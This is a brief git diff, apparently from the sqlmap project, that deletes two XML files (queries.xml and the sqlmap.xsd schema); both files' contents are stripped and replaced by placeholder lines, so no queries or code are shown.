diff --git a/xml/queries.xml b/xml/queries.xml deleted file mode 100644 index 3a1b19f1b1e..00000000000 --- a/xml/queries.xml +++ /dev/null @@ -1,628 +0,0 @@
[Deleted queries.xml, 628 lines (content stripped).]
diff --git a/xml/sqlmap.xsd b/xml/sqlmap.xsd deleted file mode 100644 index 62e35e12bef..00000000000 --- a/xml/sqlmap.xsd +++ /dev/null @@ -1,284 +0,0 @@
[Deleted sqlmap.xsd schema, 284 lines (content stripped).]